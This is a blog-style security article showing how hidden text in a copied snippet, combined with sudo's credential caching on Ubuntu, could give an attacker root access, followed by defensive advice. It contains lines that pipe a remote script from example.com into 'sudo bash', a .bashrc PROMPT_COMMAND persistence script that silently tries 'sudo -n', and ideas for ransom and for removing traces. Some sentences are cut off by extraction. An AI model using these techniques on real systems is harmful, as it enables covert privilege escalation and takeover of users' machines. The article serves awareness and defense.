Ubuntu is configured by default to cache the user's credentials for a couple
minutes after a successful use of
sudo. This is very comfortable. When you
enter a couple commands in succession, you do not have to enter the password
every single time. Take the following:
sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade
sudo authentication would not be cached, you would have to enter your
password three times.
The hidden text
There is a danger to this. One often finds code snippets on the internet which
will tell you to perform some commands like the
apt-get commands up there.
There is a very subtle trick to smuggle in something you did not see. Take
the following text. Mark it with your mouse, copy and paste it in the text
field right below. You can also paste it into your terminal, this snippet is
echo I have copied this from the DANGEROUS internet.
Did the word
DANGEROUS show up? If not, your browser is smarter than mine.
Now an attacker can do the following. First he will tell you to run something
sudo apt-get update. You enter your password and your
credentials are cached. Then after a few other innocent commands he will
prepare something like the following:
something; curl example.com/dangerous.sh | sudo bash; something
The part between the
; will be hidden, of course. You would only see
something; something which looks good to you. The
contain some malicious payload which is then directly executed as
Some malicious things I could think of:
- Set up a
cronjob to download more payload every day. You never know what you might want to do with a hacked computer, right?
- Add your own package repository to the system. Then you can even "update"
packages on the machine and the user will think that he is installing
legitimate update. openSUSE's
zypperwill tell you about those "vendor changes" which is a very good thing.
- Create yourself a user account on the machine and do something funny with it.
- Change the
rootpassword, remove all other users from the
admgroup. Then demand a ransom. If you have bad luck, the user knows how to use a Live CD and not to trust a compromised system.
The advanced hidden text
So I have shown you a way to get superuser access to a computer with the
timeout when you get the user to paste something into his terminal session
where the credentials are cached. But some users might be more careful. They
might know about the credential caching and only copy code from the internet
when it does not involve
sudo. One can still get them with the timeout. It is
just a tad harder.
The sudo credential caching usually only works within the active session. So
when you open a second terminal window and execute something with
will have to type the password again. Otherwise you could simply have some
process lurking in the background and try to call
sudo every minute to see
whether the timeout is activated.
One needs to sneak into the currently active terminal window. It is not hard
and I will show you how easy it is to do. First one needs to upload a script
like the following to say
#!/bin/bash echo 'PROMPT_COMMAND="sudo -n ~/.try_root.sh &> /dev/null && echo Owned!"' >> ~/.bashrc cat > ~/.try_root.sh <<EOF #!/bin/bash touch /tmp/owned EOF chmod +x ~/.try_root.sh
Using the method described above, get the user to execute something like
curl example.com/mount_attack.sh | bash. Since no superuser permissions are
involved, there is no waiting or dependence on the timeout.
The next time the user opens up a terminal, the new
.bashrc will be read. The
PROMPT_COMMAND is executed before the prompt is displayed. The
-n flag lets
sudo run in non-interactive mode. It will just fail if the credentials are
not cached. All output is suppressed, so the user will not notice anything.
Once the superuser credentials are cached in the current session, the
PROMPT_COMMAND will be able to execute the
.try_root.sh script which will
then dig into the system and make itself at home. It could do all the things
that I have mentioned above.
In a real attack, one would obfuscate the names of all things involved. After gaining superuser access it would be a good idea to remove the traces within the home directory.
One should be able to protect themselves from this. You can do this in layers.
sudotimeout completely. This can be done by adding the following line to
Instead you can use
sudo -ito obtain a
rootlogin shell to type all the commands without
sudo. This is more secure than using
sudo -ssince that uses the
rootinstead of your own. An attack I just showed you here should be possible against the use of
sudo -sas well. Just wait until the user ID changes to 0 and launch your code.
Do not copy & paste code from websites directly into your shell. Paste it into an editor window instead and look what it does. Alternatively you could type the commands yourself as well.
Regularly scanning files like
.bashrc for those kind of things are probably
not really doing any good. The attacker would just remove all the traces once
the attack is launched. There are so many attack vectors, cleaning up is
probably not worth the effort. Rather invest in security up front by being